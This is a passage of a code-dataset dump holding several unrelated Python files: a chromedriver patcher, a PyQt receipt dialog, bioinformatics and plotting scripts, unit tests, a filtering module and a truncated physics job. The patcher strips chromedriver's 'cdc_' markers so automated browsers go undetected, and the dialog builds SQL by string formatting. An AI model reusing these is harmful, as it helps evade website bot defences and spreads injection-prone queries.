re.sub(b\"cdc_.{22}\", replacement, line)\n fh.write(newline)\n linect += 1\n return linect\n\n @staticmethod\n def find_chrome_executable():\n \"\"\"\n Finds the chrome, chrome beta, chrome canary, chromium executable\n Returns\n -------\n executable_path : str\n the full file path to found executable\n \"\"\"\n candidates = set()\n if IS_POSIX:\n for item in os.environ.get(\"PATH\").split(os.pathsep):\n for subitem in (\"google-chrome\", \"chromium\", \"chromium-browser\"):\n candidates.add(os.sep.join((item, subitem)))\n if \"darwin\" in sys.platform:\n candidates.update(\n [\"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome\"]\n )\n else:\n for item in map(\n os.environ.get, (\"PROGRAMFILES\", \"PROGRAMFILES(X86)\", \"LOCALAPPDATA\")\n ):\n for subitem in (\n \"Google/Chrome/Application\",\n \"Google/Chrome Beta/Application\",\n \"Google/Chrome Canary/Application\",\n ):\n candidates.add(os.sep.join((item, subitem, \"chrome.exe\")))\n for candidate in candidates:\n if os.path.exists(candidate) and os.access(candidate, os.X_OK):\n return os.path.normpath(candidate)\n\n def get_chrome_version(self):\n \"\"\"\n\n :return:\n \"\"\"\n chrome_path = self.find_chrome_executable()\n if chrome_path:\n chrome_dir = os.path.dirname(chrome_path)\n chrome_files = os.listdir(chrome_dir)\n for file in chrome_files:\n math = re.fullmatch('\\d{2,3}\\.0\\.\\d{4}\\.\\d{1,}', file)\n if math:\n chrome_version = math.string\n return LooseVersion(chrome_version)\n else:\n return\n\n def conf_file(self):\n conf_path = os.path.join(self.data_path, 'conf.json')\n if not os.path.exists(conf_path):\n with open(conf_path, 'w', encoding='utf-8') as file:\n conf = {\n \"chrome version\": \"\",\n \"chromedriver version\": \"\"\n }\n json.dump(conf, file, indent=4)\n\n def __repr__(self):\n return \"{0:s}({1:s})\".format(\n self.__class__.__name__,\n self.executable_path,\n )\n\n\nif __name__ == '__main__':\n p = Patcher()\n print(p.auto())\n","sub_path":"castom_driver/patcher.py","file_name":"patcher.py","file_ext":"py","file_size_in_byte":10732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"452594676","text":"from PyQt5 import QtWidgets, QtGui, QtCore, QtSql\n\nfrom functions import desktopSizer\nfrom database.database import DBQuery\nfrom widgets.widgets import QTableView, JNewDialog\n\n\nclass ChooseRentDialog(JNewDialog):\n def __init__(self, rec_id, dbHandler, parent=None):\n super().__init__(parent)\n\n self.dbHandler = dbHandler\n\n self.setWindowTitle(\"Choose receipt\")\n h, v = desktopSizer(250, 200)\n self.resize(h, 400)\n\n self.vertLayout = QtWidgets.QVBoxLayout(self)\n\n self.lInfo = QtWidgets.QLabel(\"This payment was allocated to several rents, which\\nwould you like to use as the base for the receipt?\", self)\n\n self.tabRecOptions = QTableView(self)\n self.modelOptions = DBQuery(\"\", self)\n self.tabRecOptions.setModel(self.modelOptions)\n\n self.modelOptions.setQuery(QtSql.QSqlQuery(\"\"\"SELECT RentCode\n FROM income_allocation\n WHERE IncomeID = {}\"\"\".format(rec_id)))\n\n self.tabRecOptions.doubleClicked.connect(self.finish)\n\n self.vertLayout.addWidget(self.lInfo)\n self.vertLayout.addWidget(self.tabRecOptions)\n\n def finish(self, idx):\n self.chosenRentcode = self.modelOptions.data(idx)\n self.accept()\n\n def result(self):\n return self.chosenRentcode\n","sub_path":"income/chooserentdialog.py","file_name":"chooserentdialog.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"467047546","text":"#! /powerapps/share/python-anaconda-3.6/bin/python\n\nimport sys\nsys.path.insert(0,'/sternadi/home/volume1/taliakustin/SternLab')\nfrom optparse import OptionParser\nimport os\nimport glob\nimport argparse\nfrom Bio import SeqIO, Seq, SeqRecord\nimport re\nfrom file_utilities import check_filename, check_dirname\nimport seqFileAnalyzer\nimport pandas as pd\n\ndef main(args):\n fasta_file = check_filename(args.fasta)\n gb_file = check_filename(args.gb)\n fasta = list(SeqIO.parse(fasta_file, \"fasta\"))\n output = check_filename(args.output, Truefile=False)\n new_fasta_file = []\n index_text = \"\"\n ids = []\n count = 0\n no_cds = 0\n ambisense_problems = 0\n for g in SeqIO.parse(gb_file, \"gb\"):\n for f in fasta:\n if g.id in f.id and g.description in f.description:\n orientation = []\n cdss = []\n for feature in g.features:\n if feature.type == \"source\":\n mol_type = feature.qualifiers[\"mol_type\"][0]\n if feature.type == \"CDS\":\n is_CDS = True\n orientation.append(feature.location.strand)\n cdss.append(feature.location.extract(g.seq))\n if len(cdss) == 0:\n no_cds += 1\n continue\n if len(set(orientation)) != 1:\n #print(f\"{f.id} is Ambisense\")\n if mol_type == \"viral cRNA\" or mol_type==\"mRNA\":\n new_id = f.id.split(\" \")[0]\n if new_id in ids:\n print(\"PROBLEM!!!\")\n continue\n ids.append(new_id)\n index_text += f\"{new_id} {f.description}\\n\"\n f.id = new_id\n f.description = \"\"\n new_fasta_file.append(f)\n elif mol_type == \"genomic RNA\" or mol_type==\"genomic DNA\":\n f.seq = f.seq.reverse_complement()\n count += 1\n new_id = f.id.split(\" \")[0]\n if new_id in ids:\n print(\"PROBLEM!!!\")\n continue\n ids.append(new_id)\n index_text += f\"{new_id} {f.description}\\n\"\n f.id = new_id\n f.description = \"\"\n new_fasta_file.append(f)\n else:\n print(mol_type)\n raise TypeError(\"problem with ambisense\")\n ambisense_problems+=1\n continue\n else:\n for cds in cdss:\n if cds in f.seq:\n new_id = f.id.split(\" \")[0]\n if new_id in ids:\n print(\"PROBLEM!!!\")\n continue\n ids.append(new_id)\n index_text += f\"{new_id} {f.description}\\n\"\n f.id = new_id\n f.description = \"\"\n new_fasta_file.append(f)\n break\n elif cds.reverse_complement() in f.seq:\n f.seq = f.seq.reverse_complement()\n count += 1\n\n new_id = f.id.split(\" \")[0]\n if new_id in ids:\n print(\"PROBLEM comp!!!\")\n ids.append(new_id)\n index_text += f\"{new_id} {f.description}\\n\"\n f.id = new_id\n f.description = \"\"\n new_fasta_file.append(f)\n break\n\n\n\n\n\n\n print(f\"reverse complemented {count} sequences (out of {len(fasta)} seqneces)\")\n print(f\"number of sequences in new file {len(new_fasta_file)}\")\n print(f\"sequences with no CDS {no_cds}\")\n print(f\"sequences with ambisense problem {ambisense_problems}\")\n SeqIO.write(new_fasta_file, output, \"fasta\")\n output_index = output.split(\".fasta\")[0] + \".index.txt\"\n with open(output_index, \"w\") as handle:\n handle.write(index_text)\n\n\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", \"--fasta\", type=str,\n help=\"fasta file\", required=True)\n parser.add_argument(\"-g\", \"--gb\", type=str,\n help=\"gene bank file\", required=True)\n parser.add_argument(\"-o\", \"--output\", type=str,\n help=\"output fasta file\", required=True)\n args = parser.parse_args()\n main(args)\n\n","sub_path":"TILV_analysis/get_sequences_to_cds_orientation.py","file_name":"get_sequences_to_cds_orientation.py","file_ext":"py","file_size_in_byte":4847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"581952151","text":"\"\"\"Test SectorModel and SectorModelBuilder\n\"\"\"\nfrom copy import copy\nfrom unittest.mock import Mock\n\nimport numpy as np\nfrom pytest import raises\nfrom smif.metadata import Metadata, MetadataSet\nfrom smif.model.scenario_model import ScenarioModel\nfrom smif.model.sector_model import SectorModel, SectorModelBuilder\nfrom smif.parameters import ParameterList\n\n\nclass EmptySectorModel(SectorModel):\n\n def initialise(self, initial_conditions):\n pass\n\n def simulate(self, timestep, data=None):\n return {}\n\n def extract_obj(self, results):\n return 0\n\n\nclass TestCompositeSectorModel():\n\n def test_add_input(self):\n\n model = EmptySectorModel('test_model')\n model.add_input('input_name', [], [], 'units')\n\n inputs = model.model_inputs\n\n assert inputs.names == ['input_name']\n assert inputs.units == ['units']\n\n assert inputs['input_name'] == Metadata('input_name', [], [], 'units')\n\n def test_add_output(self):\n\n model = EmptySectorModel('test_model')\n model.add_output('output_name', Mock(), Mock(), 'units')\n\n outputs = model.model_outputs\n\n assert outputs.names == ['output_name']\n assert outputs.units == ['units']\n\n def test_run_sector_model(self):\n\n model = EmptySectorModel('test_model')\n model.add_input('input_name', [], [], 'units')\n data = {'input_name': [0]}\n actual = model.simulate(2010, data)\n assert actual == {}\n\n def test_scenario_dependencies(self):\n\n scenario_model = ScenarioModel('test_scenario')\n scenario_model.add_output('scenario_output', Mock(), Mock(), 'units')\n data = np.array([[[120.23]]])\n timesteps = [2010]\n scenario_model.add_data(data, timesteps)\n\n model = EmptySectorModel('test_model')\n model.add_input('input_name', Mock(), Mock(), 'units')\n model.add_dependency(scenario_model, 'scenario_output', 'input_name')\n\n assert 'input_name' in model.deps\n assert model.get_scenario_data('input_name') == data\n\n\nclass TestSectorModelBuilder():\n\n def test_add_inputs(self, setup_project_folder):\n\n model_path = str(setup_project_folder.join('models', 'water_supply',\n '__init__.py'))\n\n builder = SectorModelBuilder('test')\n builder.load_model(model_path, 'WaterSupplySectorModel')\n\n inputs = [{'name': 'an_input',\n 'spatial_resolution': 'LSOA',\n 'temporal_resolution': 'annual',\n 'units': 'tonnes'}]\n\n builder.add_inputs(inputs)\n\n assert 'an_input' in builder._sector_model.model_inputs.names\n\n def test_sector_model_builder(self, setup_project_folder):\n model_path = str(setup_project_folder.join('models', 'water_supply',\n '__init__.py'))\n\n register = Mock()\n register.get_entry = Mock(return_value='a_resolution_set')\n\n registers = {'regions': register,\n 'intervals': register}\n\n builder = SectorModelBuilder('water_supply', registers)\n builder.load_model(model_path, 'WaterSupplySectorModel')\n\n assets = [\n {\n 'name': 'water_asset_a',\n 'type': 'water_pump',\n 'attributes': {\n 'capital_cost': 1000,\n 'economic_lifetime': 25,\n 'operational_lifetime': 25\n }\n }\n ]\n builder.add_interventions(assets)\n\n # builder.add_inputs(inputs)\n # builder.add_outputs(outputs)\n\n model = builder.finish()\n assert isinstance(model, SectorModel)\n\n assert model.name == 'water_supply'\n assert model.intervention_names == ['water_asset_a']\n assert model.interventions == assets\n\n def test_path_not_found(self):\n builder = SectorModelBuilder('water_supply', Mock())\n with raises(FileNotFoundError) as ex:\n builder.load_model('/fictional/path/to/model.py', 'WaterSupplySectorModel')\n msg = \"Cannot find '/fictional/path/to/model.py' for the 'water_supply' model\"\n assert msg in str(ex.value)\n\n\nclass TestInputs:\n\n def test_add_no_inputs(self, setup_project_folder):\n model_path = str(setup_project_folder.join('models', 'water_supply', '__init__.py'))\n registers = {'regions': Mock(),\n 'intervals': Mock()}\n\n builder = SectorModelBuilder('water_supply_test', registers)\n builder.load_model(model_path, 'WaterSupplySectorModel')\n builder.add_inputs(None)\n sector_model = builder.finish()\n assert isinstance(sector_model.model_inputs, MetadataSet)\n actual_inputs = sector_model.model_inputs.names\n assert actual_inputs == []\n\n\nclass TestSectorModel(object):\n\n def test_interventions_names(self):\n assets = [\n {'name': 'water_asset_a'},\n {'name': 'water_asset_b'},\n {'name': 'water_asset_c'}\n ]\n model = EmptySectorModel('test_model')\n model.interventions = assets\n\n intervention_names = model.intervention_names\n\n assert len(intervention_names) == 3\n assert 'water_asset_a' in intervention_names\n assert 'water_asset_b' in intervention_names\n assert 'water_asset_c' in intervention_names\n\n def test_interventions(self):\n interventions = [\n {\n 'name': 'water_asset_a',\n 'capital_cost': 1000,\n 'economic_lifetime': 25,\n 'operational_lifetime': 25\n },\n {\n 'name': 'water_asset_b',\n 'capital_cost': 1500,\n },\n {\n 'name': 'water_asset_c',\n 'capital_cost': 3000,\n }\n ]\n model = EmptySectorModel('test_model')\n model.interventions = interventions\n actual = model.interventions\n\n assert actual == interventions\n\n assert sorted(model.intervention_names) == [\n 'water_asset_a',\n 'water_asset_b',\n 'water_asset_c'\n ]\n\n\nclass TestParameters():\n\n def test_add_parameter(self):\n \"\"\"Adding a parameter adds a reference to the parameter list entry to\n the model that contains it.\n \"\"\"\n\n model = copy(EmptySectorModel('test_model'))\n model.simulate = lambda x, y: {'savings': y['smart_meter_savings']}\n\n param_config = {'name': 'smart_meter_savings',\n 'description': 'The savings from smart meters',\n 'absolute_range': (0, 100),\n 'suggested_range': (3, 10),\n 'default_value': 3,\n 'units': '%'}\n model.add_parameter(param_config)\n\n assert isinstance(model.parameters, ParameterList)\n\n param_config['parent'] = model\n\n assert model.parameters['smart_meter_savings'] == param_config\n\n actual = model.simulate(2010, {'smart_meter_savings': 3})\n expected = {'savings': 3}\n assert actual == expected\n","sub_path":"tests/model/test_sector_model.py","file_name":"test_sector_model.py","file_ext":"py","file_size_in_byte":7186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"424710535","text":"from django.core.urlresolvers import reverse\nfrom django.test import TestCase\n\nfrom server.models import *\n\n\nclass PlayerViewTests(TestCase):\n def setUp(self):\n self.username = 'test_user'\n self.password = 'test_password'\n self.user = User.objects.create_user(username=self.username, password=self.password)\n self.client.login(username=self.username, password=self.password)\n\n self.region = Region.objects.create(\n name='First Region'\n )\n self.hunt = Hunt.objects.create(\n name='First hunt',\n private_token='j14WVsOPsIdzQIZGQeymFmpPv4LqpHQWck8ua0ZdCY71'\n )\n self.player = Player.objects.create(\n uuid='41f94400-2a3e-408a-9b80-1774724f62af',\n name='First Agent'\n )\n self.hunt_token = AuthorizedUsers.objects.create(\n hunt=self.hunt,\n user=self.user\n )\n self.item1 = Item.objects.create(\n uuid='41f94400-2a3e-408a-9b80-1774724f62af',\n name='First Item',\n type=Item.TYPE_PRIZE,\n position_x=25.00,\n position_y=50.00,\n position_z=75.00,\n points=15,\n enabled=True,\n region=self.region,\n hunt=self.hunt\n )\n self.item2 = Item.objects.create(\n uuid='aaaaaaaa-2aaa-408a-aaaa-aaaaaaaaaaaa',\n name='Second Item',\n type=Item.TYPE_CREDIT,\n position_x=125.00,\n position_y=150.00,\n position_z=175.00,\n points=13,\n enabled=True,\n region=self.region,\n hunt=self.hunt\n )\n self.transaction1 = Transaction.objects.create(\n points=15,\n player_x=0.0,\n player_y=25.0,\n player_z=50.0,\n item_x=75.0,\n item_y=100.0,\n item_z=125.0,\n player=self.player,\n region=self.region,\n hunt=self.hunt,\n item=self.item1\n )\n self.transaction2 = Transaction.objects.create(\n points=13,\n player_x=10.0,\n player_y=125.0,\n player_z=150.0,\n item_x=175.0,\n item_y=1100.0,\n item_z=1125.0,\n player=self.player,\n region=self.region,\n hunt=self.hunt,\n item=self.item2\n )\n\n def test_authorized(self):\n server_data = dict(\n hunt_id=self.hunt.id,\n )\n\n response = self.client.get(reverse('frontend:view_hunt_players', kwargs=server_data))\n self.assertEquals(response.status_code, 200)\n","sub_path":"frontend/tests/views/test_view_hunt_players_view.py","file_name":"test_view_hunt_players_view.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"35041571","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/12/7 18:05\n# @Author : Scheaven\n# @File : 001_test.py\n# @description:\nimport torch\nclass MyModel(torch.nn.Module):\n def __init__(self, N, M):\n super(MyModel, self).__init__()\n self.linear = torch.nn.Linear(N, M)\n\n def forward(self, inputs):\n output = self.linear(inputs)\n return output\n\n\nif __name__== \"__main__\":\n B, N, M = 64, 32, 8\n model = MyModel(N, M)\n\n #第一种方法\n traced_script_module = torch.jit.script(model)\n traced_script_module.save(\"model.pt\")\n\n\n # model = BaseLine().model.cpu().eval()\n # # An example input you would normally provide to your model's forward() method.\n # example = torch.rand(1, 3, 256, 128)\n\n #第二种方法\n # # Use torch.jit.trace to generate a torch.jit.ScriptModule via tracing.\n # traced_script_module = torch.jit.trace(model, example)\n # traced_script_module.save(\"demo/model.pt\")","sub_path":"001_pytorch2libtorch_model/002_py2CPP_model.py","file_name":"002_py2CPP_model.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"571352312","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\ndata = pd.read_csv('../LoanStats3a.csv')\nindex = ['< 1 year', '1 year', '2 years', '3 years', '4 years', \n'5 years', '6 years', '7 years', '8 years', '9 years','10 years','10+ years']\n\nmapping = pd.Series([0,1,2,3,4,5,6,7,8,9,10,11], index)\ndata['emp_length_int'] = data['emp_length'].map(mapping)\ntest_emp_len_int = data['emp_length_int']\n\nx = test_emp_len_int\ny = data['loan_amnt']\nplt.xticks(x, index)\n\nplt.hist(test_emp_len_int.dropna(), color='blue')\nplt.autoscale(tight=True)\nplt.xticks(rotation=45)\n\naxes = plt.gca()\naxes.set_ylim([min(y),max(y)])\naxes.set_xticks([i for i in range(1,12) ])\naxes.set_xticklabels(index)\n\nplt.show()\n\n#fig = plt.gcf()\n#fig.set_size_inches(10, 10, forward=True)\n#fig.savefig('test.png', dpi=100)\n","sub_path":"code_for_challenge/employee_length_vs_loan_amt.py","file_name":"employee_length_vs_loan_amt.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"115794886","text":"def main():\r\n #Initialize an accumulator\r\n total = 0.0\r\n\r\n try:\r\n #Open the sales_data.txt file\r\n infile = open('sales_data.txt', 'r')\r\n\r\n #Read value from file\r\n for line in infile:\r\n amount = float(line)\r\n total += amount\r\n\r\n #Close file\r\n infile.close()\r\n\r\n #Print total\r\n print(format(total, ',.2f'))\r\n except:\r\n print('An error occured.')\r\n\r\nmain()\r\n","sub_path":"Chap 6/sales_report2.py","file_name":"sales_report2.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"259380700","text":"from .timeseries import StateSpaceModel, AffineProcess\nimport torch\nfrom math import sqrt\nfrom torch.distributions import Normal, MultivariateNormal, Independent\nfrom .utils import construct_diag, TempOverride\nfrom .module import Module, TensorContainer\n\n\ndef _propagate_sps(spx, spn, process, temp_params):\n \"\"\"\n Propagate the Sigma points through the given process.\n :param spx: The state Sigma points\n :type spx: torch.Tensor\n :param spn: The noise Sigma points\n :type spn: torch.Tensor\n :param process: The process\n :type process: AffineProcess\n :return: Translated and scaled sigma points\n :rtype: torch.Tensor\n \"\"\"\n\n is_md = process.ndim > 1\n\n if not is_md:\n spx = spx.squeeze(-1)\n spn = spn.squeeze(-1)\n\n with TempOverride(process, '_theta_vals', temp_params):\n out = process.propagate_u(spx, u=spn)\n return out if is_md else out.unsqueeze(-1)\n\n\ndef _covcalc(a, b, wc):\n \"\"\"\n Calculates the covariance from a * b^t\n :param a: The `a` matrix\n :type a: torch.Tensor\n :param b: The `b` matrix\n :type b: torch.Tensor\n :return: The covariance\n :rtype: torch.Tensor\n \"\"\"\n cov = a.unsqueeze(-1) * b.unsqueeze(-2)\n\n return (wc[:, None, None] * cov).sum(-3)\n\n\ndef _get_meancov(spxy, wm, wc):\n \"\"\"\n Calculates the mean and covariance given sigma points for 2D processes.\n :param spxy: The state/observation sigma points\n :type spxy: torch.Tensor\n :param wm: The W^m\n :type wm: torch.Tensor\n :param wc: The W^c\n :type wc: torch.Tensor\n :return: Mean and covariance\n :rtype: tuple of torch.Tensor\n \"\"\"\n\n x = (wm.unsqueeze(-1) * spxy).sum(-2)\n centered = spxy - x.unsqueeze(-2)\n\n return x, _covcalc(centered, centered, wc)\n\n\nclass UnscentedTransform(Module):\n def __init__(self, model, a=1, b=2, k=0):\n \"\"\"\n Implements the Unscented Transform for a state space model.\n :param model: The model\n :type model: StateSpaceModel\n :param a: The alpha parameter. Defined on the interval [0, 1]\n :type a: float\n :param b: The beta parameter. Optimal value for Gaussian models is 2\n :type b: float\n :param k: The kappa parameter. To control the semi-definiteness\n :type k: float\n \"\"\"\n\n # ===== Model ===== #\n self._model = model\n self._ndim = 2 * model.hidden_ndim + model.obs_ndim\n\n if self._model.hidden.distributional_theta or self._model.observable.distributional_theta:\n raise ValueError('Cannot currently handle case when distribution is parameterized!')\n\n # ===== Parameters =====#\n self._a = a\n self._b = b\n self._lam = a ** 2 * (self._ndim + k) - self._ndim\n\n # ===== Auxiliary variables ===== #\n self._ymean = None\n self._ycov = None\n self._views = None\n\n self._diaginds = range(model.hidden_ndim)\n\n def modules(self):\n return {}\n\n def _set_slices(self):\n \"\"\"\n Sets the different slices for selecting states and noise.\n :return: Instance of self\n :rtype: UnscentedTransform\n \"\"\"\n\n self._sslc = slice(self._model.hidden_ndim)\n self._hslc = slice(self._model.hidden_ndim, 2 * self._model.hidden_ndim)\n self._oslc = slice(2 * self._model.hidden_ndim, None)\n\n return self\n\n def _set_weights(self):\n \"\"\"\n Generates the weights used for sigma point construction.\n :return: Instance of self\n :rtype: UnscentedTransform\n \"\"\"\n\n self._wm = torch.zeros(1 + 2 * self._ndim)\n self._wc = self._wm.clone()\n self._wm[0] = self._lam / (self._ndim + self._lam)\n self._wc[0] = self._wm[0] + (1 - self._a ** 2 + self._b)\n self._wm[1:] = self._wc[1:] = 1 / 2 / (self._ndim + self._lam)\n\n return self\n\n def _set_arrays(self, x):\n \"\"\"\n Sets the mean and covariance arrays.\n :param x: The initial state.\n :type x: torch.Tensor\n :return: Instance of self\n :rtype: UnscentedTransform\n \"\"\"\n\n # ==== Define empty arrays ===== #\n if not isinstance(x, torch.Tensor):\n x = torch.tensor(x)\n\n parts = x.shape[:-1] if self._model.hidden_ndim > 1 else x.shape\n\n self._mean = torch.zeros((*parts, self._ndim))\n self._cov = torch.zeros((*parts, self._ndim, self._ndim))\n self._sps = torch.zeros((*parts, 1 + 2 * self._ndim, self._ndim))\n\n # TODO: Perhaps move this to Timeseries?\n self._views = TensorContainer()\n shape = (parts[0], 1) if len(parts) > 0 else parts\n\n if len(parts) > 1:\n shape += (1,)\n\n for model in [self._model.hidden, self._model.observable]:\n params = tuple()\n for p in model.theta:\n if p.trainable:\n view = p.view(*shape, *p.shape[1:])\n else:\n view = p\n\n params += (view,)\n\n self._views.append(TensorContainer(*params))\n\n return self\n\n def initialize(self, x):\n \"\"\"\n Initializes UnscentedTransform class.\n :param x: The initial values of the mean of the distribution.\n :type x: torch.Tensor\n :return: Instance of self\n :rtype: UnscentedTransform\n \"\"\"\n\n self._set_weights()._set_slices()._set_arrays(x)\n\n # ==== Set mean ===== #\n self._mean[..., self._sslc] = x if self._model.hidden_ndim > 1 else x.unsqueeze(-1)\n\n # ==== Set state covariance ===== #\n var = self._model.hidden.initial_dist.variance\n if self._model.hidden_ndim < 2:\n var.unsqueeze_(-1)\n\n self._cov[..., self._sslc, self._sslc] = construct_diag(var)\n\n # ==== Set noise covariance ===== #\n self._cov[..., self._hslc, self._hslc] = construct_diag(self._model.hidden.increment_dist.variance)\n self._cov[..., self._oslc, self._oslc] = construct_diag(self._model.observable.increment_dist.variance)\n\n return self\n\n def get_sps(self):\n \"\"\"\n Constructs the Sigma points used for propagation.\n :return: Sigma points\n :rtype: torch.Tensor\n \"\"\"\n cholcov = sqrt(self._lam + self._ndim) * torch.cholesky(self._cov)\n\n self._sps[..., 0, :] = self._mean\n self._sps[..., 1:self._ndim+1, :] = self._mean[..., None, :] + cholcov\n self._sps[..., self._ndim+1:, :] = self._mean[..., None, :] - cholcov\n\n return self._sps\n\n def propagate_sps(self, only_x=False):\n \"\"\"\n Propagate the Sigma points through the given process.\n :return: Sigma points of x and y\n :rtype: tuple of torch.Tensor\n \"\"\"\n\n sps = self.get_sps()\n\n spx = _propagate_sps(sps[..., self._sslc], sps[..., self._hslc], self._model.hidden, self._views[0])\n if only_x:\n return spx\n\n spy = _propagate_sps(spx, sps[..., self._oslc], self._model.observable, self._views[1])\n\n return spx, spy\n\n @property\n def xmean(self):\n \"\"\"\n Returns the mean of the latest state.\n :return: The mean of state\n :rtype: torch.Tensor\n \"\"\"\n\n return self._mean[..., self._sslc].clone()\n\n @xmean.setter\n def xmean(self, x):\n \"\"\"\n Sets the mean of the latest state.\n :param x: The mean state to use for overriding\n :type x: torch.Tensor\n \"\"\"\n\n self._mean[..., self._sslc] = x\n\n @property\n def xcov(self):\n \"\"\"\n Returns the covariance of the latest state.\n :return: The state covariance\n :rtype: torch.Tensor\n \"\"\"\n\n return self._cov[..., self._sslc, self._sslc]\n\n @xcov.setter\n def xcov(self, x):\n \"\"\"\n Sets the covariance of the latest state\n :param x: The state covariance to use for overriding\n :type x: torch.Tensor\n \"\"\"\n\n self._cov[..., self._sslc, self._sslc] = x\n\n @property\n def ymean(self):\n \"\"\"\n Returns the mean of the observation.\n :return: The mean of the observational process\n :rtype: torch.Tensor\n \"\"\"\n\n return self._ymean\n\n @property\n def ycov(self):\n \"\"\"\n Returns the covariance of the observation.\n :return: The covariance of the observational process\n :rtype: torch.Tensor\n \"\"\"\n\n return self._ycov\n\n @property\n def x_dist(self):\n \"\"\"\n Returns the current X-distribution.\n :rtype: Normal|MultivariateNormal\n \"\"\"\n\n if self._model.hidden_ndim < 2:\n return Normal(self.xmean[..., 0], self.xcov[..., 0, 0].sqrt())\n\n return MultivariateNormal(self.xmean, scale_tril=torch.cholesky(self.xcov))\n\n @property\n def x_dist_indep(self):\n \"\"\"\n Returns the current X-distribution but independent.\n :rtype: Normal|MultivariateNormal\n \"\"\"\n\n if self._model.hidden_ndim < 2:\n return self.x_dist\n\n dist = Normal(self.xmean, self.xcov[..., self._diaginds, self._diaginds].sqrt())\n return Independent(dist, 1)\n\n @property\n def y_dist(self):\n \"\"\"\n Returns the current Y-distribution.\n :rtype: Normal|MultivariateNormal\n \"\"\"\n if self._model.obs_ndim < 2:\n return Normal(self.ymean[..., 0], self.ycov[..., 0, 0].sqrt())\n\n return MultivariateNormal(self.ymean, scale_tril=torch.cholesky(self.ycov))\n\n def construct(self, y):\n \"\"\"\n Constructs the mean and covariance given the current observation and previous state.\n :param y: The current observation\n :type y: torch.Tensor|float\n :return: Self\n :rtype: UnscentedTransform\n \"\"\"\n\n # ==== Get mean and covariance ===== #\n txmean, txcov, ymean, ycov = self._get_m_and_p(y)\n\n # ==== Overwrite mean and covariance ==== #\n self._ymean = ymean\n self._ycov = ycov\n self._mean[..., self._sslc] = txmean\n self._cov[..., self._sslc, self._sslc] = txcov\n\n return self\n\n def get_meancov(self):\n \"\"\"\n Constructs the mean and covariance for the hidden and observable process respectively.\n :return: The mean and covariance\n :rtype: tuple\n \"\"\"\n\n # ==== Propagate Sigma points ==== #\n spx, spy = self.propagate_sps()\n\n # ==== Construct mean and covariance ==== #\n xmean, xcov = _get_meancov(spx, self._wm, self._wc)\n ymean, ycov = _get_meancov(spy, self._wm, self._wc)\n\n return (xmean, xcov, spx), (ymean, ycov, spy)\n\n def _get_m_and_p(self, y):\n \"\"\"\n Helper method for generating the mean and covariance.\n :param y: The latest observation\n :type y: float|torch.Tensor\n :return: The estimated mean and covariances of state and observation\n :rtype: tuple of torch.Tensor\n \"\"\"\n\n (xmean, xcov, spx), (ymean, ycov, spy) = self.get_meancov()\n\n # ==== Calculate cross covariance ==== #\n if xmean.dim() > 1:\n tx = spx - xmean.unsqueeze(-2)\n else:\n tx = spx - xmean\n\n if ymean.dim() > 1:\n ty = spy - ymean.unsqueeze(-2)\n else:\n ty = spy - ymean\n\n xycov = _covcalc(tx, ty, self._wc)\n\n # ==== Calculate the gain ==== #\n gain = torch.matmul(xycov, ycov.inverse())\n\n # ===== Calculate true mean and covariance ==== #\n txmean = xmean + torch.matmul(gain, (y - ymean).unsqueeze(-1))[..., 0]\n\n temp = torch.matmul(ycov, gain.transpose(-1, -2))\n txcov = xcov - torch.matmul(gain, temp)\n\n return txmean, txcov, ymean, ycov","sub_path":"pyfilter/unscentedtransform.py","file_name":"unscentedtransform.py","file_ext":"py","file_size_in_byte":11698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"198266984","text":"# Use DaVinci v33r8 and ganga 6\nimport sys, os\n# to be able to import jobSetup using gaudirun\nsys.path.append(os.getcwd())\nfrom jobSetup import *\n\ntry:\n dataSample = dataSamples[open('dataSample.txt').readline()] \nexcept IOError:\n pass # keep dataSample defined in jobSetup.py and loaded with from import *\n\n\nfrom Gaudi.Configuration import *\nfrom DecayTreeTuple.Configuration import *\nimport GaudiKernel.SystemOfUnits as Units\nfrom Configurables import DeterministicPrescaler\n\n# Triggers\nL0_list = ['L0HadronDecision', 'L0MuonDecision', 'L0ElectronDecision']\nHLT1_list = ['Hlt1TrackAllL0Decision', 'Hlt1TrackPhotonDecision', 'Hlt1TrackMuonDecision']\nHLT2_list = ['Hlt2ExpressKSDecision', 'Hlt2CharmHadD02HHXDst_BaryonhhXWideMassDecision']\ntrigger_list = L0_list + HLT1_list + HLT2_list\n\nclass strippingLine:\n \"\"\"\n Class to store information about stripping line that I will need to make nTuple\n \"\"\"\n def __init__(self,name, lineName, dec, branches):\n self.name = name\n self.lineName = lineName\n self.dec = dec \n self.branches = branches \n self.lineLocation = \"Phys/\"+lineName+\"/Particles\"\n \n \n def select(self):\n \"\"\"\n Get data and selection\n \"\"\"\n\n from PhysSelPython.Wrappers import Selection, SelectionSequence, DataOnDemand, AutomaticData\n # from StandardParticles import StdLooseMuons, StdLooseKaons\n from Configurables import FilterDesktop, CombineParticles, OfflineVertexFitter, LoKi__HDRFilter \n from GaudiKernel.PhysicalConstants import c_light\n\n evtPreselectors = []\n\n if dataSample.isPrescaled != False:\n if dataSample.isPrescaled == True:\n dataSample.isPrescaled = 0.1\n prescaler = DeterministicPrescaler(\"Prescaler\", AcceptFraction = dataSample.isPrescaled)\n evtPreselectors.append(prescaler)\n\n\n # # Stripping filter\n strippingFilter = LoKi__HDRFilter( 'StripPassFilter', 